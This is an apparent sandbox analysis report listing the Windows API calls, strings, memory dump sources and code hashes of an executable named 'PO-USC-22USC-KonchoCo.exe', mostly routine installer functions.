                                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                        • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                        Strings
                                                        • "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe", xrefs: 00406974
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
                                                        • *?|<>/":, xrefs: 00406982
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-921906965
                                                        • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                        • Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
                                                        • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                        • Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404685
                                                        • GetSysColor.USER32(00000000), ref: 004046C3
                                                        • SetTextColor.GDI32(?,00000000), ref: 004046CF
                                                        • SetBkMode.GDI32(?,?), ref: 004046DB
                                                        • GetSysColor.USER32(?), ref: 004046EE
                                                        • SetBkColor.GDI32(?,?), ref: 004046FE
                                                        • DeleteObject.GDI32(?), ref: 00404718
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404722
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                        • Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
                                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                        • Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                          • Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406269
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                        • String ID: 9
                                                        • API String ID: 163830602-2366072709
                                                        • Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                        • Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
                                                        • Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                        • Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DestroyWindow.USER32(?,00000000), ref: 0040304E
                                                        • GetTickCount.KERNEL32 ref: 0040306C
                                                        • wsprintfW.USER32 ref: 0040309A
                                                          • Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                          • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                          • Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                          • Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                          • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                          • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                          • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                        • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                          • Part of subcall function 00403017: MulDiv.KERNEL32(?,00000064,?), ref: 0040302C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 722711167-2449383134
                                                        • Opcode ID: c844b91f24ced077c14a758bff1a62ed25a2b151bbc768ebfdb9d0a12ed3356e
                                                        • Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
                                                        • Opcode Fuzzy Hash: c844b91f24ced077c14a758bff1a62ed25a2b151bbc768ebfdb9d0a12ed3356e
                                                        • Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
                                                        • GetMessagePos.USER32 ref: 00404FDF
                                                        • ScreenToClient.USER32(?,?), ref: 00404FF9
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                        • Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
                                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                        • Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                        • wsprintfW.USER32 ref: 00402FEA
                                                        • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                        • API String ID: 1451636040-1158693248
                                                        • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                        • Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
                                                        • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                        • Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                        • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                        • Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
                                                        • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                        • Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                        • wsprintfW.USER32 ref: 00404F58
                                                        • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$H/B
                                                        • API String ID: 3540041739-2222257793
                                                        • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                        • Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
                                                        • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                        • Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:
                                                        • API String ID: 1354259210-0
                                                        • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                        • Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
                                                        • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                        • Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                        • GetClientRect.USER32(?,?), ref: 00401DEA
                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                        • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                        • Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
                                                        • Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                        • Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
